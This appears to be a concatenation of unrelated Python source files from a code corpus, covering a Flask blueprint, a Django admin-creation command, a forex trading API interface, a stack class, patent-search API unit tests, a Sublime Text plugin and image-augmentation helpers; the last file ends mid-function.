from ctflorals.controllers import HomeController
from ctflorals.controllers import AboutController
from ctflorals.controllers import GalleryController
from ctflorals.controllers import TestimonialsController
ctflorals = Blueprint('ctflorals', __name__,
template_folder='views',
static_folder='../resources')
@ctflorals.route("/")
def home():
return HomeController().index()
@ctflorals.route("/about/")
def about():
return AboutController().index()
@ctflorals.route("/gallery/")
def gallery():
return GalleryController().index()
@ctflorals.route("/testimonials/")
def testimonials():
return TestimonialsController().index()
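# Hypothetical registration in the application factory (the Flask app object is assumed):
# from flask import Flask
# app = Flask(__name__)
# app.register_blueprint(ctflorals)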
|
60357
|
from django.core.management.base import BaseCommand
from orcamentos.crm.models import Employee
class Command(BaseCommand):
help = ''' Creates an admin user. '''
def handle(self, *args, **kwargs):
'''
Creates an Employee.
We need an Employee to perform all transactions in the system.
'''
username = 'admin'
first_name = 'Admin'
last_name = 'Admin'
email = '<EMAIL>'
user = Employee.objects.create(
username=username,
first_name=first_name,
last_name=last_name,
email=email,
gender='I'
)
user.set_password('<PASSWORD>')
user.is_staff = True
user.is_superuser = True
user.is_active = True
user.save()
print('User created successfully.')
|
60385
|
from .decorators import endpoint
from ..definitions.types import ClientExtensions
from ..definitions.types import InstrumentName
from ..definitions.types import StopLossDetails
from ..definitions.types import TakeProfitDetails
from ..definitions.types import TradeID
from ..definitions.types import TradeSpecifier
from ..definitions.types import TradeStateFilter
from ..definitions.types import TrailingStopLossDetails
from ..endpoints.annotations import Count
from ..endpoints.annotations import Ids
from ..endpoints.annotations import Units
from ..endpoints.trade import *
from ..definitions.helpers import sentinel
__all__ = ['TradeInterface']
class TradeInterface(object):
@endpoint(GETTrades)
def list_trades(self,
ids: Ids = sentinel,
state: TradeStateFilter = sentinel,
instrument: InstrumentName = sentinel,
count: Count = sentinel,
trade_id: TradeID = sentinel):
"""
Get a list of Trades for an Account
Args:
ids: :class:`~async_v20.endpoints.annotations.Ids`
List of Trade IDs to retrieve.
state: :class:`~async_v20.TradeStateFilter`
The state to filter the requested Trades by.
instrument: :class:`~async_v20.InstrumentName`
The instrument to filter the requested Trades by.
count: :class:`~async_v20.endpoints.annotations.Count`
The maximum number of Trades to return.
trade_id: :class:`~async_v20.TradeID`
The maximum Trade ID to return. If not provided the most recent
Trades in the Account are returned.
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(trades=( :class:`~async_v20.Trade`, ...),
lastTransactionID= :class:`~async_v20.TransactionID`)
"""
pass
@endpoint(GETOpenTrades)
def list_open_trades(self):
"""
Get the list of open Trades for an Account
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(trades=( :class:`~async_v20.Trade`, ...),
lastTransactionID= :class:`~async_v20.TransactionID`)
"""
pass
@endpoint(GETTradeSpecifier)
def get_trade(self, trade_specifier: TradeSpecifier = sentinel):
"""
Get the details of a specific Trade in an Account
Args:
trade_specifier: :class:`~async_v20.TradeSpecifier`
Specifier for the Trade
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(trade= :class:`~async_v20.Trade`,
lastTransactionID= :class:`~async_v20.TransactionID`)
"""
pass
@endpoint(PUTTradeSpecifierClose)
def close_trade(self,
trade_specifier: TradeSpecifier = sentinel,
units: Units = sentinel):
"""
Close (partially or fully) a specific open Trade in an Account
Args:
trade_specifier: :class:`~async_v20.TradeSpecifier`
Specifier for the Trade
units: :class:`~async_v20.endpoints.annotations.Units`
Indication of how much of the Trade to close. Either the string
"ALL" (indicating that all of the Trade should be closed), or a
DecimalNumber representing the number of units of the open
Trade to Close using a TradeClose MarketOrder. The units
specified must always be positive, and the magnitude of the
value cannot exceed the magnitude of the Trade's open units.
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(orderCreateTransaction= :class:`~async_v20.MarketOrderTransaction`,
orderFillTransaction= :class:`~async_v20.OrderFillTransaction`,
orderCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
lastTransactionID= :class:`~async_v20.TransactionID`)
status [400]
:class:`~async_v20.interface.response.Response`
(orderRejectTransaction= :class:`~async_v20.MarketOrderRejectTransaction`,
errorCode= :class:`~builtins.str`,
errorMessage= :class:`~builtins.str`)
status [401]
:class:`~async_v20.interface.response.Response`
(orderRejectTransaction= :class:`~async_v20.MarketOrderRejectTransaction`,
lastTransactionID= :class:`~async_v20.TransactionID`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
errorCode= :class:`~builtins.str`,
errorMessage= :class:`~builtins.str`)
"""
pass
@endpoint(PUTTradeSpecifierClientExtensions)
def set_client_extensions_trade(self,
trade_specifier: TradeSpecifier = sentinel,
client_extensions: ClientExtensions = sentinel):
"""
Update the Client Extensions for a Trade. Do not add, update, or delete
the Client Extensions if your account is associated with MT4.
Args:
trade_specifier: :class:`~async_v20.TradeSpecifier`
Specifier for the Trade
client_extensions: :class:`~async_v20.ClientExtensions`
The Client Extensions to update the Trade with. Do not add,
update, or delete the Client Extensions if your account is
associated with MT4.
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(tradeClientExtensionsModifyTransaction=
:class:`~async_v20.TradeClientExtensionsModifyTransaction`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
lastTransactionID= :class:`~async_v20.TransactionID`)
status [400]
:class:`~async_v20.interface.response.Response`
(tradeClientExtensionsModifyRejectTransaction=
:class:`~async_v20.TradeClientExtensionsModifyRejectTransaction`,
lastTransactionID= :class:`~async_v20.TransactionID`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
errorCode= :class:`~builtins.str`,
errorMessage= :class:`~builtins.str`)
status [401]
:class:`~async_v20.interface.response.Response`
(tradeClientExtensionsModifyRejectTransaction=
:class:`~async_v20.TradeClientExtensionsModifyRejectTransaction`,
lastTransactionID= :class:`~async_v20.TransactionID`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
errorCode= :class:`~builtins.str`,
errorMessage= :class:`~builtins.str`)
"""
pass
@endpoint(PUTTradesSpecifierOrders)
def set_dependent_orders_trade(self,
trade_specifier: TradeSpecifier = sentinel,
take_profit: TakeProfitDetails = sentinel,
stop_loss: StopLossDetails = sentinel,
trailing_stop_loss: TrailingStopLossDetails = sentinel):
"""
Create, replace and cancel a Trade's dependent Orders (Take Profit,
Stop Loss and Trailing Stop Loss) through the Trade itself
Args:
trade_specifier: :class:`~async_v20.TradeSpecifier`
Specifier for the Trade
take_profit: :class:`~async_v20.TakeProfitDetails`
The specification of the Take Profit to create/modify/cancel.
If takeProfit is set to null, the Take Profit Order will be
cancelled if it exists. If takeProfit is not provided, the
existing Take Profit Order will not be modified. If a sub-
field of takeProfit is not specified, that field will be set to
a default value on create, and be inherited by the replacing
order on modify.
stop_loss: :class:`~async_v20.StopLossDetails`
The specification of the Stop Loss to create/modify/cancel. If
stopLoss is set to null, the Stop Loss Order will be cancelled
if it exists. If stopLoss is not provided, the existing Stop
Loss Order will not be modified. If a sub-field of stopLoss is
not specified, that field will be set to a default value on
create, and be inherited by the replacing order on modify.
trailing_stop_loss: :class:`~async_v20.TrailingStopLossDetails`
The specification of the Trailing Stop Loss to
create/modify/cancel. If trailingStopLoss is set to null, the
Trailing Stop Loss Order will be cancelled if it exists. If
trailingStopLoss is not provided, the existing Trailing Stop
Loss Order will not be modified. If a sub-field of
trailingStopLoss is not specified, that field will be set to a
default value on create, and be inherited by the replacing
order on modify.
Returns:
status [200]
:class:`~async_v20.interface.response.Response`
(takeProfitOrderCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
takeProfitOrderTransaction= :class:`~async_v20.TakeProfitOrderTransaction`,
takeProfitOrderFillTransaction= :class:`~async_v20.OrderFillTransaction`,
takeProfitOrderCreatedCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
stopLossOrderCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
stopLossOrderTransaction= :class:`~async_v20.StopLossOrderTransaction`,
stopLossOrderFillTransaction= :class:`~async_v20.OrderFillTransaction`,
stopLossOrderCreatedCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
trailingStopLossOrderCancelTransaction= :class:`~async_v20.OrderCancelTransaction`,
trailingStopLossOrderTransaction= :class:`~async_v20.TrailingStopLossOrderTransaction`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
lastTransactionID= :class:`~async_v20.TransactionID`)
status [400]
:class:`~async_v20.interface.response.Response`
(takeProfitOrderCancelRejectTransaction=
:class:`~async_v20.OrderCancelRejectTransaction`,
takeProfitOrderRejectTransaction= :class:`~async_v20.TakeProfitOrderRejectTransaction`,
stopLossOrderCancelRejectTransaction= :class:`~async_v20.OrderCancelRejectTransaction`,
stopLossOrderRejectTransaction= :class:`~async_v20.StopLossOrderRejectTransaction`,
trailingStopLossOrderCancelRejectTransaction=
:class:`~async_v20.OrderCancelRejectTransaction`,
trailingStopLossOrderRejectTransaction=
:class:`~async_v20.TrailingStopLossOrderRejectTransaction`,
lastTransactionID= :class:`~async_v20.TransactionID`,
relatedTransactionIDs=( :class:`~async_v20.TransactionID`, ...),
errorCode= :class:`~builtins.str`,
errorMessage= :class:`~builtins.str`)
"""
pass
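# Hypothetical call through an async_v20 OandaClient session (client construction and the
# surrounding event loop are assumed, not shown by this module):
# response = await client.close_trade(trade_specifier='6395', units='ALL')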
|
60412
|
from simple_rl.mdp.oomdp.OOMDPStateClass import OOMDPState
class TrenchOOMDPState(OOMDPState):
''' Class for Trench World States '''
def __init__(self, objects):
OOMDPState.__init__(self, objects=objects)
def get_agent_x(self):
return self.objects["agent"][0]["x"]
def get_agent_y(self):
return self.objects["agent"][0]["y"]
def __hash__(self):
state_hash = str(self.get_agent_x()) + str(self.get_agent_y()) + str(self.objects["agent"][0]["dx"] + 1)\
+ str(self.objects["agent"][0]["dy"] + 1) + str(self.objects["agent"][0]["dest_x"])\
+ str(self.objects["agent"][0]["dest_x"]) + str(self.objects["agent"][0]["dest_y"]) + \
str(self.objects["agent"][0]["has_block"]) + "00"
for b in self.objects["block"]:
state_hash += str(b["x"]) + str(b["y"])
state_hash += "00"
for l in self.objects["lava"]:
state_hash += str(l["x"]) + str(l["y"])
return int(state_hash)
def __eq__(self, other_trench_state):
return hash(self) == hash(other_trench_state)
|
60436
|
from node import Node
class Stack:
def __init__(self):
self.head = None
def __str__(self):
node = self.head
list = []
while node:
list.append(node.get_item())
node = node.get_next()
return str(list)
def is_empty(self):
return not self.head
def push(self, item):
if not self.head:
self.head = Node(item)
else:
self.head = Node(item,self.head)
def pop(self):
if not self.head:
raise EmptyStackException('Cannot pop from an empty stack')
else:
item = self.head.get_item()
if self.head.get_next():
self.head = self.head.get_next()
else:
self.head = None
return item
def peek(self):
if not self.head:
raise EmptyStackException('Cannot peek from an empty stack')
else:
return self.head.get_item()
def size(self):
count = 0
node = self.head
while node:
count += 1
node = node.get_next()
return count
class EmptyStackException(Exception):
pass
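# Minimal usage sketch (assumes node.Node(item, next=None) exposing get_item()/get_next(),
# as the methods above already rely on):
if __name__ == "__main__":
    s = Stack()
    s.push(1)
    s.push(2)
    print(s)         # [2, 1]
    print(s.pop())   # 2
    print(s.peek())  # 1
    print(s.size())  # 1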
|
60453
|
import sys
import typing
from metal.serial import Engine
from metal.serial.hooks import MacroHook
from metal.serial.preprocessor import MacroExpansion
class Argv(MacroHook):
identifier = 'METAL_SERIAL_INIT_ARGV'
def invoke(self, engine: Engine, macro_expansion: MacroExpansion):
engine.write_int(len(self.argv))
data = b'\0'.join(arg.encode() for arg in self.argv) + b'\0'
res = engine.write_memory(data)
if res != len(data):
print("***metal.serial***: Couldn't write all of argv, buffer size was {}".format(res), file=sys.stderr)
def __init__(self, argv: typing.List[str]):
self.argv = argv
super().__init__()
def build_argv_hook(argv: typing.List[str]):
return lambda : Argv(argv)
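# Example: build a factory for a fixed argv; each call returns a fresh Argv hook
# (how the factory is consumed by the serial Engine is not shown in this module):
# make_argv_hook = build_argv_hook(['firmware_test', '--verbose'])
# hook = make_argv_hook()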
|
60495
|
from collections import Counter, defaultdict
def fizz_buzz_counter():
values = []
for i in range(1, 101):
if i % 3 == 0 and i % 5 == 0:
values.append("fizzbuzz")
elif i % 3 == 0:
values.append("fizz")
elif i % 5 == 0:
values.append("buzz")
else:
values.append("int")
return Counter(values)
def fizz_buzz_defaultdict():
values = defaultdict(int)
for i in range(1, 101):
if i % 3 == 0 and i % 5 == 0:
values["fizzbuzz"] += 1
elif i % 3 == 0:
values["fizz"] += 1
elif i % 5 == 0:
values["buzz"] += 1
else:
values["int"] += 1
return values
print(dict(fizz_buzz_counter()))
print(dict(fizz_buzz_defaultdict()))
|
60511
|
import unittest
# Run tests without using GPU
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
os.environ['TEST'] = "1"
import sys
from pathlib import Path
TEST_DIR = str(Path(__file__).parent.resolve())
BASE_DIR = str(Path(__file__).parent.parent.resolve())
sys.path.append(BASE_DIR)
from core.filters import PublicationDateFilter
from dateutil.parser import parse as parse_date
from core.api import APIRequest
from core.api import SearchRequest102
from core.api import SearchRequest103
from core.api import SnippetRequest
from core.api import MappingRequest
from core.api import DatasetSampleRequest
from core.api import SimilarPatentsRequest
from core.api import PatentPriorArtRequest
from core.api import BadRequestError
from core.api import ServerError
from core.api import ResourceNotFoundError
from core.api import DocumentRequest
from core.api import PatentDataRequest
from core.api import TitleRequest
from core.api import AbstractRequest
from core.api import AllClaimsRequest
from core.api import OneClaimRequest
from core.api import IndependentClaimsRequest
from core.api import PatentDescriptionRequest
from core.api import CitationsRequest
from core.api import BackwardCitationsRequest
from core.api import ForwardCitationsRequest
from core.api import AbstractConceptsRequest
from core.api import DescriptionConceptsRequest
from core.api import CPCsRequest
from core.api import ListThumbnailsRequest
from core.api import ThumbnailRequest
from core.api import PatentCPCVectorRequest
from core.api import PatentAbstractVectorRequest
from core.api import SimilarConceptsRequest
from core.api import ConceptVectorRequest
from core.api import DrawingRequest
from core.api import ListDrawingsRequest
from core.api import AggregatedCitationsRequest
class TestRequestClass(unittest.TestCase):
class GreetingRequest(APIRequest):
greetings = { 'en': 'Hello', 'de': 'Hallo' }
def __init__(self, req_data):
super().__init__(req_data)
def _serving_fn(self):
lang = self._data['lang']
return self.greetings[lang]
def _validation_fn(self):
if not 'lang' in self._data:
raise BadRequestError('Invalid request.')
def test_can_create_dummy_request(self):
req = APIRequest()
self.assertEqual(req.serve(), None)
def test_serving_fn_operation(self):
req = self.GreetingRequest({ 'lang': 'en' })
self.assertEqual('Hello', req.serve())
def test_raises_error_on_invalid_request(self):
def create_invalid_request():
return self.GreetingRequest({ 'locale': 'en' })
self.assertRaises(BadRequestError, create_invalid_request)
def test_raises_error_on_expection_during_serving(self):
req = self.GreetingRequest({ 'lang': 'hi' })
self.assertRaises(ServerError, req.serve)
class TestSearchRequest102Class(unittest.TestCase):
def setUp(self):
self.query = 'reducing carbon emissions'
self.date = '2017-12-12'
self.subclass = 'Y02T'
self.latent_query = 'by using green technologies'
def test_simple_search_request(self):
results = self.search({ 'q': self.query })
self.assertGreater(len(results), 0)
def test_return_custom_number_of_results(self):
results = self.search({ 'q': self.query, 'n': 13 })
self.assertEqual(13, len(results))
def test_query_with_before_cutoff_date(self):
results = self.search({ 'q': self.query, 'before': self.date })
def published_before(r):
d1 = parse_date(r['publication_date'])
d2 = parse_date(self.date)
return d1 <= d2
self.assertForEach(results, published_before)
def test_query_with_after_cutoff_date(self):
results = self.search({ 'q': self.query, 'after': self.date})
def published_after(r):
d1 = parse_date(r['publication_date'])
d2 = parse_date(self.date)
return d1 >= d2
self.assertForEach(results, published_after)
def test_query_with_index_specified(self):
cc = self.subclass
results = self.search({ 'q': self.query, 'idx': cc })
from_cc = lambda r: r['index'].startswith(cc)
self.assertForEach(results, from_cc)
def test_latent_query_affects_results(self):
latent = self.search({ 'q': self.query, 'lq': self.latent_query })
without = self.search({ 'q': self.query })
self.assertNotEqual(latent, without)
def test_return_only_non_patent_results(self):
results = self.search({ 'q': 'control systems', 'type': 'npl' })
is_npl = lambda r: r['index'].endswith('npl')
self.assertForEach(results, is_npl)
def test_include_snippets(self):
results = self.search({ 'q': self.query, 'snip': 1 })
has_snippet = lambda r: r['snippet']
self.assertForEach(results, has_snippet)
def test_include_mappings(self):
results = self.search({ 'q': self.query, 'maps': 1 })
has_mappings = lambda r: r['mapping']
self.assertForEach(results, has_mappings)
def test_raises_error_with_bad_request(self):
bad_req = lambda: SearchRequest102({ 'qry': self.query })
self.assertRaises(BadRequestError, bad_req)
def test_pagination(self):
results_a = self.search({ 'q': self.query, 'n': 10 })
results_b = self.search({ 'q': self.query, 'n': 10, 'offset': 5})
self.assertEqual(results_a[5:], results_b[:5])
def search(self, req):
req = SearchRequest102(req)
results = req.serve()['results']
return results
def assertForEach(self, results, condition):
self.assertGreater(len(results), 0)
truth_arr = [condition(res) for res in results]
self.assertTrue(all(truth_arr))
class TestSearchRequest103Class(unittest.TestCase):
def setUp(self):
self.query = 'fire fighting drone uses dry ice'
def test_simple_search(self):
combinations = self.search({ 'q': self.query })
self.assertGreater(len(combinations), 0)
def test_return_custom_number_of_results(self):
combinations = self.search({ 'q': self.query, 'n': 8 })
self.assertEqual(8, len(combinations))
def test_pagination(self):
results_a = self.search({ 'q': self.query, 'n': 10 })
results_b = self.search({ 'q': self.query, 'n': 10, 'offset': 5})
self.assertEqual(results_a[5:], results_b[:5])
def search(self, req):
req = SearchRequest103(req)
results = req.serve()['results']
return results
class TestDatasetSampleRequestClass(unittest.TestCase):
def test_request_a_sample_from_poc(self):
self.assertSample('poc', 23)
self.assertSample('poc', 45023)
def test_request_a_sample_that_does_not_exist(self):
non_existent_sample = lambda: self.make_request('poc', 200200)
self.assertRaises(ServerError, non_existent_sample)
def test_access_non_existent_dataset(self):
non_existent_dataset = lambda: self.make_request('dog', 1)
self.assertRaises(ResourceNotFoundError, non_existent_dataset)
def test_invalid_request(self):
invalid_request = lambda: DatasetSampleRequest({ 'sample': 3 }).serve()
self.assertRaises(BadRequestError, invalid_request)
def assertSample(self, dataset, n):
sample = self.make_request(dataset, n)
self.assertIsInstance(sample, dict)
def make_request(self, dataset, n):
request = DatasetSampleRequest({ 'dataset': dataset, 'n': n })
return request.serve()
class TestSimilarPatentsRequestClass(unittest.TestCase):
def test_invalid_query(self):
make_bad_query = lambda: SimilarPatentsRequest({ 'q': 'drones'})
self.assertRaises(BadRequestError, make_bad_query)
def test_with_simple_query(self):
response = SimilarPatentsRequest({ 'pn': 'US7654321B2' }).serve()
self.assertIsInstance(response, dict)
self.assertIsInstance(response['results'], list)
self.assertGreater(len(response['results']), 0)
class TestPatentPriorArtRequestClass(unittest.TestCase):
def test_with_simple_query(self):
response = PatentPriorArtRequest({ 'pn': 'US7654321B2'}).serve()
results = response['results']
def published_before(r):
d1 = parse_date(r['publication_date'])
d2 = parse_date('2006-12-27')
return d1 <= d2
self.assertForEach(results, published_before)
def assertForEach(self, results, condition):
truth_arr = [condition(res) for res in results]
self.assertTrue(all(truth_arr))
class TestSnippetRequestClass(unittest.TestCase):
pass
class TestMappingRequestClass(unittest.TestCase):
pass
class TestDrawingRequestClass(unittest.TestCase):
def setUp(self):
self.pat = 'US7654321B2'
self.app = 'US20130291398A1'
def test_get_patent_drawing(self):
response = DrawingRequest({'pn': self.pat, 'n': 1}).serve()
self.assertIsInstance(response, str)
def test_get_second_image(self):
response = DrawingRequest({'pn': self.pat, 'n': 2}).serve()
self.assertIsInstance(response, str)
def test_get_publication_drawing(self):
response = DrawingRequest({'pn': self.app, 'n': 1}).serve()
self.assertIsInstance(response, str)
class TestListDrawingsRequestClass(unittest.TestCase):
def setUp(self):
self.pat = 'US7654321B2'
self.app = 'US20130291398A1'
def test_list_drawings_of_patent(self):
response = ListDrawingsRequest({'pn': self.pat}).serve()
self.assertEqual(8, len(response['drawings']))
self.assertEqual(self.pat, response['pn'])
def test_list_drawings_of_application(self):
response = ListDrawingsRequest({'pn': self.app}).serve()
self.assertEqual(12, len(response['drawings']))
self.assertEqual(self.app, response['pn'])
class TestDocumentRequestClass(unittest.TestCase):
def test_get_patent_document(self):
doc = DocumentRequest({'id': 'US7654321B2'}).serve()
self.assertIsInstance(doc, dict)
self.assertEqual(doc['id'], 'US7654321B2')
class TestPatentDataRequestClass(unittest.TestCase):
def test_returns_patent_data(self):
data = PatentDataRequest({'pn': 'US7654321B2'}).serve()
self.assertIsInstance(data, dict)
self.assertEqual(data['title'][:24], 'Formation fluid sampling')
self.assertEqual(data['pn'], 'US7654321B2')
self.assertNonNullString(data['abstract'])
self.assertNonNullString(data['description'])
self.assertIsInstance(data['claims'], list)
self.assertGreater(len(data['claims']), 0)
def assertNonNullString(self, string):
self.assertIsInstance(string, str)
self.assertGreater(len(string.strip()), 0)
class TestTitleRequestClass(unittest.TestCase):
def test_get_title(self):
pn = 'US7654321B2'
title = 'Formation fluid sampling apparatus and methods'
response = TitleRequest({'pn': pn}).serve()
self.assertEqual(response['pn'], pn)
self.assertEqual(response['title'], title)
class TestAbstractRequestClass(unittest.TestCase):
def test_get_abstract(self):
pn = 'US7654321B2'
abst = 'A fluid sampling system retrieves'
response = AbstractRequest({'pn': pn}).serve()
self.assertEqual(response['pn'], pn)
self.assertEqual(response['abstract'][:len(abst)], abst)
class TestAllClaimsRequestClass(unittest.TestCase):
def test_get_all_claims(self):
pn = 'US7654321B2'
response = AllClaimsRequest({'pn': pn}).serve()
self.assertIsInstance(response['claims'], list)
self.assertEqual(26, len(response['claims']))
class TestOneClaimRequestClass(unittest.TestCase):
def setUp(self):
self.pn = 'US7654321B2'
def test_get_one_claim(self):
claim_2 = '2. The fluid sampling system of claim 1, in which'
response = OneClaimRequest({'pn': self.pn, 'n': 2}).serve()
self.assertEqual(2, response['claim_num'])
self.assertEqual(claim_2, response['claim'][:len(claim_2)])
def test_raises_error_on_invalid_requests(self):
invalid_requests = [
{'pn': self.pn},
{'pn': self.pn, 'n': 0},
{'pn': self.pn, 'n': 'first'},
{'pn': self.pn, 'n': 27},
{'pn': self.pn, 'n': -1}
]
for req_data in invalid_requests:
req = lambda: OneClaimRequest(req_data).serve()
self.assertRaises(BadRequestError, req)
class TestIndependentClaimsRequestClass(unittest.TestCase):
def test_get_independent_claims(self):
pn = 'US7654321B2'
response = IndependentClaimsRequest({'pn': pn}).serve()
self.assertEqual(response['pn'], pn)
self.assertEqual(6, len(response['claims']))
class TestPatentDescriptionRequestClass(unittest.TestCase):
def test_get_description(self):
pn = 'US7654321B2'
response = PatentDescriptionRequest({'pn': pn}).serve()
self.assertNonNullString(response['description'])
def assertNonNullString(self, string):
self.assertIsInstance(string, str)
self.assertGreater(len(string.strip()), 0)
class TestCitationsRequestClass(unittest.TestCase):
def test_get_citations(self):
pn = 'US7654321B2'
response = CitationsRequest({'pn': pn}).serve()
self.assertIsInstance(response['citations_backward'], list)
self.assertGreater(len(response['citations_backward']), 0)
self.assertIsInstance(response['citations_forward'], list)
self.assertGreater(len(response['citations_forward']), 0)
class TestBackwardCitationsRequestClass(unittest.TestCase):
def test_get_back_citations(self):
pn = 'US7654321B2'
response = BackwardCitationsRequest({'pn': pn}).serve()
self.assertIsInstance(response['citations_backward'], list)
self.assertGreater(len(response['citations_backward']), 0)
class TestForwardCitationsRequestClass(unittest.TestCase):
def test_get_forward_citations(self):
pn = 'US7654321B2'
response = ForwardCitationsRequest({'pn': pn}).serve()
self.assertIsInstance(response['citations_forward'], list)
self.assertGreater(len(response['citations_forward']), 0)
class TestAbstractConceptsRequestClass(unittest.TestCase):
def test_get_concepts_from_abstract(self):
pn = 'US7654321B2'
response = AbstractConceptsRequest({'pn': pn}).serve()
self.assertIsInstance(response['concepts'], list)
self.assertGreater(len(response['concepts']), 0)
class TestDescriptionConceptsRequestClass(unittest.TestCase):
def test_get_concepts_from_description(self):
pn = 'US7654321B2'
response = DescriptionConceptsRequest({'pn': pn}).serve()
self.assertIsInstance(response['concepts'], list)
self.assertGreater(len(response['concepts']), 0)
class TestCPCsRequestClass(unittest.TestCase):
def test_get_cpcs(self):
pn = 'US7654321B2'
response = CPCsRequest({'pn': pn}).serve()
self.assertIsInstance(response['cpcs'], list)
self.assertGreater(len(response['cpcs']), 0)
class TestListThumbnailsRequestClass(unittest.TestCase):
def test_get_list_of_available_thumbnails(self):
pn = 'US7654321B2'
response = ListThumbnailsRequest({'pn': pn}).serve()
self.assertEqual(8, len(response['thumbnails']))
class TestThumbnailRequestClass(unittest.TestCase):
def test_get_a_thumbnail(self):
req_data = {'pn': 'US7654321B2', 'n': '1'}
response = ThumbnailRequest(req_data).serve()
self.assertIsInstance(response, str)
class TestPatentCPCVectorRequestClass(unittest.TestCase):
def test_get_cpc_patent_vector(self):
pn = 'US7654321B2'
response = PatentCPCVectorRequest({'pn': pn}).serve()
self.assertIsInstance(response['vector'], list)
self.assertEqual(256, len(response['vector']))
class TestPatentAbstractVectorRequestClass(unittest.TestCase):
def test_get_abstract_text_vector(self):
pn = 'US7654321B2'
response = PatentAbstractVectorRequest({'pn': pn}).serve()
self.assertIsInstance(response['vector'], list)
self.assertEqual(768, len(response['vector']))
class TestSimilarConceptsRequestClass(unittest.TestCase):
def test_get_similar_concepts_to_vehicle(self):
response = SimilarConceptsRequest({'concept': 'vehicle'}).serve()
self.assertIsInstance(response['similar'], list)
self.assertGreater(len(response['similar']), 0)
def test_return_custom_number_of_concepts(self):
request = {'concept': 'vehicle', 'n': 13}
response = SimilarConceptsRequest(request).serve()
self.assertIsInstance(response['similar'], list)
self.assertEqual(13, len(response['similar']))
def test_raises_error_on_invalid_concept(self):
attempt = lambda: SimilarConceptsRequest({'concept': 'django'}).serve()
self.assertRaises(ResourceNotFoundError, attempt)
class TestConceptVectorRequestClass(unittest.TestCase):
def test_get_vector_for_vehicle(self):
response = ConceptVectorRequest({'concept': 'vehicle'}).serve()
self.assertIsInstance(response['vector'], list)
self.assertEqual(256, len(response['vector']))
def test_raises_error_on_invalid_concept(self):
attempt = lambda: ConceptVectorRequest({'concept': 'django'}).serve()
self.assertRaises(ResourceNotFoundError, attempt)
class TestAggregatedCitationsRequest(unittest.TestCase):
def test_get_one_level_citations(self):
req_data = {'levels': 1, 'pn': 'US7654321B2'}
response = AggregatedCitationsRequest(req_data).serve()
self.assertIsInstance(response, list)
self.assertEqual(len(response), 73)
def test_get_two_level_citations(self):
req_data = {'levels': 2, 'pn': 'US7654321B2'}
response = AggregatedCitationsRequest(req_data).serve()
self.assertIsInstance(response, list)
self.assertGreater(len(response), 73)
def test_raises_error_if_level_parameter_missing(self):
req_data = {'pn': 'US7654321B2'}
attempt = lambda: AggregatedCitationsRequest(req_data).serve()
self.assertRaises(BadRequestError, attempt)
def test_raises_error_if_no_level_specified(self):
req_data = {'pn': 'US7654321B2', 'levels': None}
attempt = lambda: AggregatedCitationsRequest(req_data).serve()
self.assertRaises(BadRequestError, attempt)
def test_raises_error_if_level_out_of_range(self):
req_data = {'levels': 5, 'pn': 'US7654321B2'}
attempt = lambda: AggregatedCitationsRequest(req_data).serve()
self.assertRaises(BadRequestError, attempt)
def test_raises_error_if_citations_grow_a_lot(self):
req_data = {'levels': 4, 'pn': 'US7654321B2'}
attempt = lambda: AggregatedCitationsRequest(req_data).serve()
self.assertRaises(ServerError, attempt)
if __name__ == '__main__':
unittest.main()
|
60552
|
import sublime, sublime_plugin
import os
try:
# ST3
from ..apis.core import Core
except (ImportError, ValueError):
# ST2
from apis.core import Core
# Completion
class ERBAutocompleteListener(sublime_plugin.EventListener):
def on_query_completions(self, view, prefix, locations):
core = Core()
self.completions = []
specialkey = False
scope = core.words.get('scope')
temp = core.get_line_text(view)
lineText = temp[-1]
        specialkey = lineText.find("<") >= 0
if scope and view.match_selector(locations[0], scope):
self.completions += core.words.get('completions')
self.completions += core.get_custom_tag()
if not self.completions:
return []
completions = list(self.completions)
if specialkey:
for idx, item in enumerate(self.completions):
self.completions[idx][1] = item[1][1:]
completions = [tuple(attr) for attr in self.completions]
return completions
def on_load(self, view):
filename = view.file_name()
if not filename:
return
core = Core()
name = os.path.basename(filename.lower())
if name[-8:] == "html.erb" or name[-3:] == "erb":
try:
view.settings().set('syntax', core.get_grammar_path())
print("Switched syntax to: ERB")
except:
pass
|
60628
|
import os
import numpy as np
import random
import numbers
import skimage
from skimage import io, color
import torch
# read uint8 image from path
def imread_uint8(imgpath, mode='RGB'):
'''
mode: 'RGB', 'gray', 'Y', 'L'.
'Y' and 'L' mean the Y channel of YCbCr.
'''
if mode == 'RGB':
img = io.imread(imgpath)
elif mode == 'gray':
img = io.imread(imgpath, as_gray=True)
img = skimage.img_as_ubyte(img)
elif mode in ['Y','L']:
# Y channel of YCbCr
        # Note: skimage.color.rgb2ycbcr() matches MATLAB's implementation,
        # while PIL.Image.convert('YCbCr') does not.
img = io.imread(imgpath)
if img.ndim == 3:
img = color.rgb2ycbcr(img)[:,:,0]
img = img.round().astype(np.uint8)
return img
def augment_img(img, mode='8'):
'''flip and/or rotate the image randomly'''
if mode == '2':
mode = random.randint(0, 1)
elif mode == '4':
mode = random.randint(0, 3)
elif mode == '8':
mode = random.randint(0, 7)
else:
mode = 0
if mode == 0:
return img
elif mode == 1:
return np.fliplr(img)
elif mode == 2:
return np.rot90(img, k=2)
elif mode == 3:
return np.fliplr(np.rot90(img, k=2))
elif mode == 4:
return np.rot90(img, k=1)
elif mode == 5:
return np.fliplr(np.rot90(img, k=1))
elif mode == 6:
return np.rot90(img, k=3)
elif mode == 7:
return np.fliplr(np.rot90(img, k=3))
def random_crop(img, size):
'''crop image patch randomly'''
if isinstance(size, numbers.Number):
size = (int(size), int(size))
h, w = img.shape[0:2]
ph, pw = size
rnd_h = random.randint(0, h - ph)
rnd_w = random.randint(0, w - pw)
